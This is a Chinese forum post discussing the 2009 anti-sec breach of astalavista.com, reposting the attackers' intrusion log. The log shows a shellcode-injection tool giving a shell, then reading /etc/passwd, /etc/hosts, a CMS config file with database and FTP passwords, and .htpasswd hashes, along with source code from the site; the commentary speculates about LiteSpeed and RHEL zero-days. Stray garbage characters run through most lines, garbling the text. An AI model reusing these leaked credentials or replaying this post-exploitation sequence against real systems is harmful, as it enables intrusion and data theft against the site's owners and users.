里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
- Y) Z; V% L0 k/ z4 R9 H$ k
# m5 k' N6 \' T4 n6 m7 ~7 C5 y[root@front3 ~]# curl -I litespeedtech.com
. d: t5 `- S4 _2 D8 J, HHTTP/1.1 200 OK
9 h) N9 m6 y! ]0 ?7 u" ~; aDate: Fri, 05 Jun 2009 22:54:51 GMT. Z8 `6 Q/ ], Y9 A& b
Server: LiteSpeed
2 E r# j: {9 k" B, q; W2 I, z7 W [) ] A- v6 [0 S) s
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
. p0 o/ E: m: ?. V2 K
. w5 {1 i6 f/ B% Q, ?& W5 e有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。( Q$ i: }; J6 h1 f9 ]( I
. D# Q9 Z, ]7 o$ C$ Q6 ?
( [6 y0 f* Y8 `1 F2 V/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ! Q6 _0 q; T1 t/ [$ b
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \- @) ?. H0 C1 s
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
. x5 ~0 f& i! N; n( ~% c. t1 V\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
* T/ E# h5 P# {! g0 n7 P \/ \/ \/ \/ \/ \/ \/
' @4 Z: L( K( H7 c% z The Hacking & Security Community0 E# a% I1 ?7 E; Y
[+] Founded in 1997 by a hacker computer enthusiast( V: S; ]7 t" Q d, H- C5 `# x! Z
[-] Exposed in 2009 by anti-sec group- y# ]6 ]! s) o/ ~4 A
2 l/ H& @4 Y7 \1 C! l
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
8 g* i) ]6 v) I/ Q>> 03. Who’s behind the site?
1 U3 [+ |* I9 W# \/ `; H- k0 G>>9 K" X% H8 K! d7 i3 _4 V0 `+ E
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
& H3 C4 o" o$ b0 \
4 V! L& U5 O' O- F>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
% ~4 c# L8 |& b>>! n. c1 X( o: g( j$ U* ~% y8 h
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and- |- b2 L) u1 i5 ]6 L, g0 q) {
military institutions.7 y. R$ U) W' _& x7 i
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.5 x q# }/ C0 I) p0 ]
, v0 m0 a8 C2 Y: i* }
Why has Astalavista been targeted?2 ^5 D$ W: X* `
3 T7 W* E o2 q
Other than the fact that they are not doing any of this for the “community” but* f y4 t! s8 n2 K
for the money, they spread exploits for kids, claim to be a security community
$ y/ I5 F( o: E% W& y(with no real sense of security on their own servers), and they charge you $6.66! W2 K$ }+ g. |9 D
per months to access a dead forum with a directory filled with public releases/ J( g( z9 M- c) S" C" m7 F
and outdated / broken services.# X( v5 c8 p7 B
3 O- |% I4 I: rWe wanted to see how good that “team of security and IT professionals” really is.$ L6 z" P" E" x2 w+ e, ~
) _1 x( [5 f; K' Q
Let’s begin.8 U0 l6 Z3 { z% x; c) n) W& H$ p
+ g7 ?6 t, N( F& Z% R( F+ s8 v
anti-sec:~# ./g0tshell astalavista.com -p 80) n! f& b' s; r' A2 g. c
[+] Connecting to astalavista.com:80
) _! T! p4 W! r# v' q[+] Grabbing banner…( J+ i0 G! o" X- v; `2 u3 r& ^
LiteSpeed
, E6 C# |5 A1 k[+] Injecting shellcode…/ f3 m8 @1 \" O7 T6 }) H; p
[-] Wait for it
$ z' q: q. o9 |# W$ J8 s$ s
. {9 H$ v. }% X4 V[~] We g0tshell
. U) J3 R2 H5 h8 u* }) Suname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux# e' G6 [( Q+ K+ C
ID: uid=100(apache) gid=500(apache) groups=500(apache)
5 J9 X, \% O9 [1 `$ M g4 k1 y6 r$ e- c, I2 w" A" a
sh-3.2$ cat /etc/passwd
! i; ^, I( `7 Q6 L" Q. J; d" Xroot:x:0:0:root:/root:/bin/bash
: h5 {. y- S$ z/ cbin:x:1:1:bin:/bin:/sbin/nologin
2 i, U+ R5 z. B) [* t) Ddaemon:x:2:2:daemon:/sbin:/sbin/nologin+ N9 o3 T5 O. |8 s# L
adm:x:3:4:adm:/var/adm:/sbin/nologin! \' Y8 i1 Q& r$ |) c
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin8 f! `& [2 U! O) z Q* @+ ]! ?
sync:x:5:0:sync:/sbin:/bin/sync5 _: t% m/ e9 R6 d! L5 ]- i
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
6 K1 ~! F1 N; a$ ~& x# l4 khalt:x:7:0:halt:/sbin:/sbin/halt
4 J# S' H4 b/ g) @: U/ W& A; Mmail:x:8:12:mail:/var/spool/mail:/sbin/nologin* B0 z; d) v' c; U8 V$ j1 z& u
news:x:9:13:news:/etc/news:1 C6 ?& x0 |3 N8 I U9 k/ Y
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
0 K% v. k# @0 f" O) [5 i* ^operator:x:11:0 perator:/root:/sbin/nologin
8 L6 z, ?, |+ | [: m& ygames:x:12:100:games:/usr/games:/sbin/nologin
# l# i6 @' W2 _$ n1 t$ g7 ^1 e( Lgopher:x:13:30:gopher:/var/gopher:/sbin/nologin4 \5 H2 ~( ^) C( u
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
6 R8 D* v0 g4 B5 o# nnobody:x:99:99:Nobody:/:/sbin/nologin
& Z2 H! K9 b( l! W4 drpm:x:37:37::/var/lib/rpm:/sbin/nologin$ ~$ E1 a8 J$ ]# t6 R* V
dbus:x:81:81:System message bus:/:/sbin/nologin
4 b+ k$ \$ k% ]# f4 \nscd:x:28:28:NSCD Daemon:/:/sbin/nologin: z( D7 t) |. r
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin( q- C! f* ^+ B! N% P( x$ V' |. a
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
9 A" n1 ]& E4 r' P' f/ |vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
& u/ i w( p& Shaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
: g7 m2 W8 s8 J& G9 s- ?rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
0 ~% T3 o2 Q" h& c7 f; n ?) Srpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin. n( h+ H G, t% d% Q
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin. z9 |; t+ D5 s2 b3 o
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
J6 G4 Q/ D. ^( g2 {$ Spcap:x:77:77::/var/arpwatch:/sbin/nologin) E; t. v0 p" Q3 i$ S
named:x:25:25:Named:/var/named:/sbin/nologin; b: U* C4 B# L0 c
apache:x:100:500::/var/www:/bin/false1 X! b2 H R' ]: [& `9 r$ ?8 ?: d% m
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
) f' V; i. A4 _5 D( F5 q, b% Umysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash7 n |2 i) s& i q
webapps:x:500:501::/var/www/html:/bin/bash
5 m, Y$ [) ]4 |+ P+ ~5 S1 X3 Vmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
z) t1 q. p2 C4 i+ g( _admin:x:501:502::/home/admin:/bin/bash
2 h5 K4 d+ A) T/ l- Ljon:x:502:503::/home/jon:/bin/bash
* f$ z6 i( l- M* T) E5 q% R5 n( e+ `com:x:503:504::/home/com:/bin/bash9 d, I- h6 B8 s) `& V9 C/ j
ntp:x:38:38::/etc/ntp:/sbin/nologin
% U$ O1 f K' T9 M# b0 Cais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
9 ^8 g0 {5 S8 h7 V7 @- Zastanet:x:504:505::/home/astanet:/bin/bash
+ E' S8 ~8 `7 K6 ^avahi:x:70:70:Avahi daemon:/:/sbin/nologin
1 Z; K7 m6 i/ Gavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin" x% A/ s$ d& l0 m* J' N A: q
* G( B$ b% b1 Z' |7 f: Z' h3 |sh-3.2$ cat /etc/hosts/ n: z- T% D+ u) P6 S
# Do not remove the following line, or various programs. t& d- @% G* z' H* a
# that require network functionality will fail.
: t) l( o6 j+ y+ t127.0.0.1 localhost.localdomain localhost
* `" u7 a2 C- E' p' w::1 localhost6.localdomain6 localhost69 e \- ?: P% w- A# E
80.74.154.172 asta1.astalavistaserver.com
3 I& \5 U9 ~3 Y. I! w/ ^8 }& {/ o2 A2 d% ~
sh-3.2$ pwd( C( i- Q6 z8 ]: |* X, I
/home/com/public_html
( T. }( G) Q! ]; w2 j7 q
& t3 V' F$ d& R3 V6 T$ M3 g) M" Tsh-3.2$ ls -la q( w$ ^3 n2 J
total 18460
* K1 B2 y2 c% H) g& E8 fdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
* \; e) ^ a9 C2 n- e/ b! fdrwx–x–x 11 com com 4096 Jun 25 2008 ..
( y2 f( O* l$ F, J A( _! T( Bdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
1 s3 y3 \& O7 X8 sdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
* e) v; D% q& @; m) n e# ddrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
1 K% l. C, w5 l# s5 ^1 W: o8 Bdrwxrwxrwx 2 com com 4096 May 19 00:50 config# c' A! o" `3 K
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
4 f4 m6 j5 }$ H" o2 Jdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules) Q1 d0 ], L6 U3 O/ `
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
) I2 a: O" [& O) i5 r: t5 hdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
# q2 N2 t# h5 @drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
9 }. {/ T" j4 X" l5 A8 n-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ E7 M7 r! x5 ]7 ~4 Pdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd# `% W4 t! M# @
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor2 s9 q* x7 Z) w* y, L
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico) J& w5 }3 t; M! N3 O
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed: `( [; ~9 ?0 p
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess% c; I/ i" L7 a/ p
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak/ F p6 S! Q5 ?/ _/ u
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
# Q6 p- I0 y: qdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool8 @" L% }' S( }, ~' Q, Z. t
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images$ @2 f5 c3 w6 S$ S9 B$ E
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
4 ^2 J- a+ j$ d5 mdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer7 F. _9 w/ ~6 _; ^" m" c
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang+ @6 U' q. n! U
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
3 v6 J- H. [7 z& C) o6 Xdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media' |% }" ^* E h( q# Y
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
# `/ w& x5 c. j/ p0 Zdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
6 T% r" h/ m1 p4 A2 Y* _3 U! t j) Qdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin& {& ~/ `( _9 l. x4 Z4 Q
drwxrwxr-x 22 com com 4096 May 28 17:06 _new5 y8 U6 P5 w* E; n* A3 m- h
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
9 o! ~ ]8 I4 b9 Y$ U+ Sdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy U. ?4 G* s9 g- k: z P) u" @
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy/ m; \" p9 o, m4 a0 E; ~: k
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
( {6 e8 s! H% _6 M9 D* S-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml# D' O' }3 D5 z9 t1 B
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php) i1 V' r3 h$ A6 u7 C7 ]
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes3 x# n6 o! |4 P* h
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp, E9 H! }! I' J: q2 U M
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
8 [% B, B5 j: A( v" m) |4 V' C0 p; Y
sh-3.2$ head -20 index.php& b5 h. M# d+ P. c Q9 Z4 q
<?php" @( e L% `* n$ O( a4 K
" W% c" d" `; G R6 e' U$ k/**
; K- \& Z4 A% I1 q9 S* The main page for the CMS
! J5 y' w# P) ]3 _* @copyright CONTREXX CMS - COMVATION AG
( R7 U1 |- b0 {9 y+ m. t% h* @author Comvation Development Team
* Z$ N7 q( V) @ T, Q* @version v1.0.9.10.1 stable
3 f5 |* N; w O* k& ~* @package contrexx
. e6 Z3 u! ^5 c" H% ~* @subpackage core
- h# [) M! H4 `3 _* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
) ~1 r; _, B! v% |; @9 }4 |% Z* @since v0.0.0.0
8 f. I* e" q( J( @) r* @todo Capitalize all class names in project3 \/ k8 v4 U) T% s+ M6 H5 e
* @uses /config/configuration.php
0 _, [# z7 t( V* @uses /config/settings.php3 a% Z$ Z$ r2 J, K) c
* @uses /config/version.php' ~' R( j; W. c/ T' E4 ^
* @uses /core/API.php
" m0 K+ i7 W5 [: z7 y, |, k* @uses /core_modules/cache/index.class.php
- I/ x0 l: V% D* @uses /core/error.class.php
+ L- M1 j* D# i% f8 _* @uses /core_modules/banner/index.class.php d0 t# P2 K) W3 S: M
* @uses /core_modules/contact/index.class.php9 L4 Q z2 K5 }8 J
0 B# F$ o1 H% I7 C: p) wsh-3.2$ cd config/, u$ d; @& m' [! B
sh-3.2$ ls -la; f; e# H$ G. g* b9 X0 k, D
total 32
/ N6 z+ O1 k: U3 V) edrwxrwxrwx 2 com com 4096 May 19 00:50 .
0 D. {7 |% G- s" u/ y. W+ p! p' Zdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' ~) ]: j- z; `7 g-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
, U- k6 S$ X0 t0 B7 O-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php6 P! X/ c4 ?- Y$ [' J! o0 w6 S
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php# K6 H: h! O7 I* D
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php( x: g6 T7 p* T7 E& i d
# S h+ z! M& y( y
sh-3.2$ cat configuration.php% r, P% x6 U1 q$ |* ~
[snip]9 s5 d j8 }& B1 w/ w4 ^
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost+ w6 A/ e& Y# N w5 U3 I; L9 [
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
8 k0 s( T: D! _2 p4 o$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix7 l" S. g9 }) k9 ?; r, t8 ]
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
1 R4 |( ?! z5 W3 ]9 J0 A9 [4 g$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
2 R7 M! K$ b+ ?; H7 z$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
* o4 m" A& W6 @$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)9 C/ S5 r( C- V. K1 P* N; T Y# V
[snip]
& d( p' ]4 ]7 S2 N5 f8 J$_FTPCONFIG['is_activated'] = true; // Ftp support true or false, p# E. P1 J L/ s$ N
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
# z0 ]0 B" s" I8 o2 r# T$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
% L+ T3 Q/ h1 Z9 l2 j$_FTPCONFIG['port'] = 21; // Ftp remote port
/ h$ w8 I2 b, B: E$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username) Y3 {/ a1 C# z/ \0 \1 e1 h
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
" {- B; f! ^2 p0 T$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms" s: D" q7 s- \: b6 ]
+ [8 I' U( p/ d: }/ W# @! i
sh-3.2$ cd ..
3 n# x/ T" e9 ~0 Dsh-3.2$ cd dvd/7 A: B1 ]% i, L8 p0 T: U+ q
sh-3.2$ ls -la+ k& F& d7 ~1 V" o7 k
total 2913780$ Q; f5 m* A" u7 K0 K; Z* ~+ o
drwxr-xr-x 2 com com 4096 Sep 9 2008 .4 t% M& F) R @0 ^$ `
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..: |. }/ O6 R5 X# J- s6 P
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar0 t2 O) z/ v3 }7 l
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar& f! D3 A: |. h/ k
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar( n) X! j4 k, E; |. v; P; M# p
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
$ i; m2 f- b9 u6 n9 @6 @+ F8 i( N# }0 V. H1 S! b, g( M J1 E" X! D
sh-3.2$ cat .htaccess8 {2 _0 ?2 G; O% ]
authType Basic
; K3 F; z4 ?: a) z% O0 W0 ^8 BauthName DVD0 a0 M i M$ G. N5 ]
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd* G: J2 ^* M8 d) R5 J k
require valid-user; P6 e! R8 t1 l0 Z
+ y1 T' x- x& Zsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
h8 P- B9 I' T* mDVDdownload:CRD8cuY6.MPT6
( V1 u5 B% r0 k* n2 CDVDdownload2:CR8a36.wluFMg
) w. d! j% v: ]5 O& ]1 d% V8 V' R+ W
sh-3.2$ cat test.php1 q9 b& l, G% R0 s$ E
<?php
4 X K" Y$ O4 ?7 O$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
7 L, c _; E9 `& ~; l: _! g$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));$ }+ Z+ j$ G. T3 Q
echo $url;
: h, E2 E3 }( l9 C: u?>
2 ^& s$ N( ?5 _
0 u; l# D1 z/ A' C3 ssh-3.2$ cd modifications/
; A/ s8 x* j; d# W4 ~: D( C9 J; vsh-3.2$ ls -la) c( l3 l$ D1 v# C6 v" b" `
total 32
' F Q$ \2 f7 C# ]* W# vdrwxr-xr-x 8 com com 4096 May 11 12:48 .0 n, Q. e2 T! r: Z7 F3 n# J) ]8 G) l2 ?$ Z
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ o6 o& ?1 d0 g4 sdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
% e) x1 r+ [. @* Ddrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs6 Y$ C O* J2 Y! Z& U' x
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
" s) c! z) r! S) r7 D; \# h' Mdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
& X! q; x; e, v' O: }7 cdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search+ }; |! p [* U; {7 Z
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp" v# j3 Q) _ b' J/ i# _
$ O9 y7 d1 u$ p
sh-3.2$ ls -R
8 `- F4 Q, R7 `7 v S- R4 ^) Z.:
; R$ T. o& a' U0 q: Y6 U8 scom_avtng cronjobs onlinetools pjirc search _tmp, ?5 c: M3 x" m o1 a! ?" V
, }/ N: ^5 J# D5 g4 M/ V./com_avtng:& M. G- ]# j, \8 a
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
. u" R3 ]8 i0 A1 t
( p- \5 b- r; Z, D/ @1 w0 C: ?./com_avtng/scripts:6 g* b5 T' q* E& f
popunder.js' P- Y. @3 C. b& a+ s8 `
1 @6 L4 ^8 ]. T* d' D5 p" Q./cronjobs:. h, x5 b" c6 F7 O% w" x. S
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp; A( F' p* y+ g! d
0 _/ j8 j2 S/ }* j./cronjobs/tmp:
; R% F8 B" k3 h* Q" H# xcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
! O) P- o5 D3 M* r5 \; f& z8 ~/ w' z( q+ P
./onlinetools:1 j/ g1 K' E3 }$ ]) f
index.php
; ]1 W9 N$ |) `9 P+ v/ \
1 S* |1 _1 Y6 F! b4 ^( s./pjirc:
; w8 z4 ^4 m& n( j4 Sa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
. N$ O2 N, U; i( ]2 D3 l$ tAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
8 t: ~9 y% {4 ibackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd2 N9 E. f% P4 C, i4 Z
% U7 d; e G3 \! E) v./pjirc/img:
- v" I* e; T& s9 U. R/ ~ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif) R, a, P, `/ O: R
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
6 H7 U/ K- u$ ^& a3 ]; Jverre-eau.gif
2 W* s( c9 [% Margh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
- u" g/ g' F8 `) q4 n A: Iverre-vin.gif
; m* |- ?2 S1 a6 Aballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif, |- N8 R3 b1 M' `4 |
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
. N6 D) ^$ k- z' ?0 F" y
6 p* H x; b( u+ Q7 p* f; c# p./pjirc/snd:2 ]$ U* |' h. s' I9 N
bell2.au ding.au' A- Q5 J) _- A9 D7 [& f
: w/ G6 h" H3 r! p9 u4 {
./search:; E3 T1 J. r. _! q2 M5 O. Q
searchEngines.php search.php
& z& v4 K B) [9 i* a
) I& {$ n1 o0 a7 Y4 t. V% a./_tmp:/ [- \: Q% [! K) }
defaultPorts.php defaultPorts.txt, m; N1 j& m9 V4 Z8 n# T7 f0 O& z6 Z
' y( L) Y% A* l# Bsh-3.2$ cd cronjobs/5 N" O6 ^+ S) q. b
sh-3.2$ cat exploits.php2 c q1 S6 |4 j/ `8 Y
[snip]
8 w" l1 V( m f7 Q! D/ k$ ]; M+ ?$categories = array();
6 L, L9 b. W% F, a$ p) M$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
; U+ h7 p$ r! X+ u9 {$expolits = file($milw0rmFile);, W. L. y0 c1 Y+ X5 e
$comExploits = array();
& z0 N% N9 S4 |" R# e% |9 n0 D[snip]
8 a# Z+ m O) \, F& h% d// manage data" l' w) z) o) x% ~3 ]
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640$ a* y# }* B9 T. p F& g* a
) z- m; B& S$ s o
// get path and title
& a2 E/ t( x4 e5 w $expolits[$x] = trim($expolits[$x]);
9 V- o, k9 M! C' S5 e $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));7 X2 O( r$ S) |$ _5 e
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
) R3 Z0 y- F+ ]: `) `" r2 w5 [0 {( T1 [ ]
// check if file exists; w: m$ X6 z$ _9 T' K1 R) _
if (file_exists($path)) {" \( r. ~( @: W! n$ r7 u" W* Y
1 D* z# E( w2 ~$ s0 [ t: X% Q
$text = file_get_contents($path);
: z: r% G" X- J& g- y" T1 [# F/ r/ m7 z6 D0 b) O* A9 Q0 ~
// get content and date( e7 ^1 U; ]$ e
//$text = htmlspecialchars($text, ENT_QUOTES);
& O% \0 F) x0 S: w6 t0 S $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
/ z! y5 @3 D8 m& ~- x1 O8 @. ^ if ($tmptext != ”) {
: ~( M0 d3 n- e+ e2 v: J) L. Y $text = $tmptext;2 z# I6 x" b0 z
} else {
! B/ w. J) M Z $text = addslashes(htmlentities($text, ENT_QUOTES));
$ w' B1 r' \% I: @$ ~2 ] }4 T: t* p! b. u% j
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));% x* ]7 p: p8 ~& o' f4 ~6 ~& A
$tmp = explode('-', $date);
3 R6 h1 |$ C1 j* l5 a8 x9 {: m $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));+ s' {, _, R; T% I( g, Y
$cat = getCategory ($path);3 D5 }3 Y- D6 ]# D4 f
$ext = pathinfo(basename($path));/ W( i1 T* P" e, n, }/ R
$ext = $ext['extension'];8 L" e- D( ~% g+ b
$qStr = ”: J$ \: {+ C; f
SELECT `id`
/ L: v; ]7 i ?# { FROM `contrexx_module_exploits`
7 c; }3 q- b# T) M6 Z WHERE `title` = ‘” . $title . “‘
# ?% ?* u/ j" B, A. z" I AND `date` = ‘” . $date . “‘
. y. E+ ^7 \4 z3 n “;
* Z9 _; K1 j0 B+ ~ echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
( }, s* o3 A" |% U5 Z $q = $_objDB->query($qStr);% C) A% f3 g2 m9 O" X2 j0 \8 S
" G3 D Z: Z! R7 J- o if ($q->numRows() == 0) {
3 z' }: ^$ s9 \0 L+ q, n
1 j' J3 ]* i+ ^ // prepare array1 U" e) ~ e7 o+ L
$comExploits[$x]['date'] = $date;
2 A" U1 i' E0 T* b* O! h* @ $comExploits[$x]['title'] = $title;
: y- `) a! E2 X% \3 m $comExploits[$x]['author'] = ‘milw0rm’;
8 N$ P% n( F" B8 w6 n" h. e' \, i $comExploits[$x]['text'] = $text;
" X. ]9 B( G2 Q% y2 B $comExploits[$x]['source'] = $ext;4 L1 u7 M5 y# [+ \4 i" ?
$comExploits[$x]['url1'] = ”;: X+ Z0 R# \* f% n& \% N
$comExploits[$x]['url2'] = ”;" p% d* P% y d
$comExploits[$x]['catid'] = $cat;
X g$ h- i8 @ c2 H- ~) d2 d $comExploits[$x]['lang'] = ‘2′;; m5 X! ~: Z8 y" [$ W% Y
$comExploits[$x]['userid'] = ‘12′;# j& I5 r" X& L& U2 m
$comExploits[$x]['startdate'] = ‘0000-00-00′;+ W! r' a& p c
$comExploits[$x]['enddate'] = ‘0000-00-00′; M0 {! I% h5 ?7 \4 Q
$comExploits[$x]['status'] = ‘1′;" o. x# r. ]1 P1 O, q6 }& d
$comExploits[$x]['changelog'] = $date;
1 v9 a3 j! a0 x0 Q3 g9 d% e2 p" g2 d) R9 S5 l; n
}7 @/ @- u9 |, l3 }0 O
[snip]+ n" F4 \" ]5 s# t: k
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
/ f; l- M. U$ e8 F _<rss version=”2.0″>
) o0 B- P1 f; m" n <channel>
% w3 x, }2 l! x$ L& G <title>ASTALAVISTA.com - Exploits</title>/ u8 F: w- P) I! y! n
<link>http://www.astalavista.com/exploits</link>( z* S! L/ c0 A: [* h
<description>All availably Exploits.</description>
" Q8 ^4 t6 E* v( x, R$ G8 x" X' Z <language>en-us</language>+ ^$ ?' F& R4 r8 H& [8 p
